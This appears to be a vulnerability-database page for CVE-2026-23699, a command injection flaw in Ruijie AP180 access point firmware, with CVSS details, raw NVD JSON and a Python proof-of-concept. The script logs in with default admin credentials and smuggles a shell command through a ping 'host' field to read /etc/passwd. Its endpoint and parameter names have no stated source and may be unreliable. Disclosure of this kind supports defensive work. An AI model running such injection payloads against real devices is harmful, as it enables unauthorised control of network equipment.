Security Vulnerability Report
CVE-2026-23699 CVSS 7.2 HIGH

CVE-2026-23699

Published: 2026-01-22 02:15:52
Last Modified: 2026-04-15 00:35:42

Description

AP180 series with firmware versions prior to AP_RGOS 11.9(4)B1P8 contains an OS command injection vulnerability. If this vulnerability is exploited, arbitrary commands may be executed on the devices.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

锐捷AP180系列 AP_RGOS固件 < 11.9(4)B1P8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-23699 PoC - Ruijie AP180 OS Command Injection # Target: Ruijie AP180 series with firmware < AP_RGOS 11.9(4)B1P8 TARGET = "http://target-ip:8080" USERNAME = "admin" PASSWORD = "admin" def exploit_command_injection(target, cmd="id"): """ Execute OS command injection on Ruijie AP180 management interface """ # Login to get session login_url = f"{target}/cgi-bin/login.cgi" login_data = { "username": USERNAME, "password": PASSWORD } session = requests.Session() try: login_resp = session.post(login_url, data=login_data, timeout=10) # Inject command via vulnerable parameter inject_url = f"{target}/cgi-bin/management.cgi" inject_data = { "action": "ping", "host": f"127.0.0.1;{cmd}", # Command injection payload "count": "1" } response = session.post(inject_url, data=inject_data, timeout=10) print(f"Response: {response.text}") return response.text except requests.exceptions.RequestException as e: print(f"Error: {e}") return None if __name__ == "__main__": print("[*] CVE-2026-23699 - Ruijie AP180 Command Injection") print(f"[*] Target: {TARGET}") # Test basic command injection result = exploit_command_injection(TARGET, "cat /etc/passwd") if result and "root:" in result: print("[+] Vulnerability confirmed!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23699", "sourceIdentifier": "[email protected]", "published": "2026-01-22T02:15:52.127", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AP180 series with firmware versions prior to AP_RGOS 11.9(4)B1P8 contains an OS command injection vulnerability. If this vulnerability is exploited, arbitrary commands may be executed on the devices."}, {"lang": "es", "value": "La serie AP180 con versiones de firmware anteriores a AP_RGOS 11.9(4)B1P8 contiene una vulnerabilidad de inyección de comandos del sistema operativo. Si se explota esta vulnerabilidad, se pueden ejecutar comandos arbitrarios en los dispositivos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN86850670/", "source": "[email protected]"}, {"url": "https://www.ruijie.co.jp/products/rg-ap180-pe_p432111650928590848.html#productDocument", "source": "[email protected]"}]}}